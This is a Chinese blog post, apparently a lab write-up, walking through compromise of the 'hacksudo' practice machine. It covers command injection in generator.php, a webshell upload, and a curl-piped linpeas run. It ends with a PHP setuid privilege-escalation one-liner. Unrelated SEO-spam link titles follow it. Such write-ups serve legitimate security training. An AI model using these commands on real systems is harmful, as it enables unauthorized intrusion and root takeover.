当前位置: 首页 > news >正文

购买域名之后怎么做网站近期网络舆情事件热点分析

购买域名之后怎么做网站,近期网络舆情事件热点分析,新网站排名优化怎么做,新手学做网站这本书环境配置 一开始桥接错网卡了 搞了半天 改回来就行了 信息收集 漏洞发现 扫个目录 大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap 都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历 换个gobuster扫一下 先看看g…

环境配置

一开始桥接错网卡了 搞了半天 改回来就行了

信息收集

在这里插入图片描述

漏洞发现

扫个目录
在这里插入图片描述
大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap
都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历
换个gobuster扫一下
在这里插入图片描述
先看看generator.php
在这里插入图片描述随便填点东西执行一下 感觉像命令注入
在这里插入图片描述
在这里插入图片描述
尝试弹个shell
没成功
那就写了个一句话 然后用蚁剑传shell
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提权

优化shell
在这里插入图片描述

看看还有没有用户,有可能待会会切过去
在这里插入图片描述
用linpeas枚举脆弱性
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
在这里插入图片描述

没看见特别显眼的
在这里插入图片描述
版本过高
考虑到有个hacksudo的用户
再收集一波信息看看能不能切过去
发现有个hacksudo的文件 在这里插入图片描述
在这里插入图片描述
有加密 一眼凯撒
试试
在这里插入图片描述
在这里插入图片描述

没有sudo权限
在这里插入图片描述
在work路径下发现sh文件
没执行权限
也没看见相关的计划任务
再传个linpeas枚举
在这里插入图片描述
可以lxd提权
在这里插入图片描述
也可以view 或 php提权
这里用php提权

CMD="/bin/sh"
./home/hacksudo/locker/php -r "posix_setuid(0); system('$CMD');"

在这里插入图片描述

http://www.qdjiajiao.com/news/2444.html

相关文章:

  • 小公司如何做网站隔离软文写作平台发稿
  • 电子商务网站按其实现的技术可分为线下推广渠道有哪些方式
  • 深圳宝安高端网站建设武汉整站优化
  • 多语言网站建设推广seo实战培训课程
  • 推广普通话作文500字优化推广什么意思
  • app开发人员网站软文营销的特点有哪些
  • 持续推进网站建设电商网站设计方案
  • 潮州seo网站推广推广软文300字
  • 治多县网站建设公司西安网站建设推广
  • 网站建设总体说明书百度云搜索引擎入口
  • 海南平台网站建设平台优化营商环境心得体会
  • 网站二级目录做优化项目网站
  • 线上 网站建设 商务信息公司网站建设代理
  • 上位机软件开发平台小红书怎么做关键词排名优化
  • 网站的功能和作用是什么广告设计与制作需要学什么
  • 做美食教程的网站有哪些填写电话的广告
  • 高端电商网站开发小程序开发收费价目表
  • wix做中文网站怎么样重庆seo排
  • 公司门户app下载朝阳seo搜索引擎
  • 河间网站建设win10优化
  • 做公司网站需要哪些资料近三天重大新闻摘抄
  • 品牌大全seo门户网价格是多少钱
  • 深圳我的网站今日热榜官网
  • php的网站怎么做的项目推广
  • 都有哪些网站可以做推广百度seo营销
  • win2012r2 建设网站电脑系统优化软件排行榜
  • o2o网站平台怎么做百度竞价登录入口
  • 电子请柬网站开发友情链接怎么互换
  • 手机网站方案.doc自己建网站怎么建
  • 天津几个区分别是谷歌seo详细教学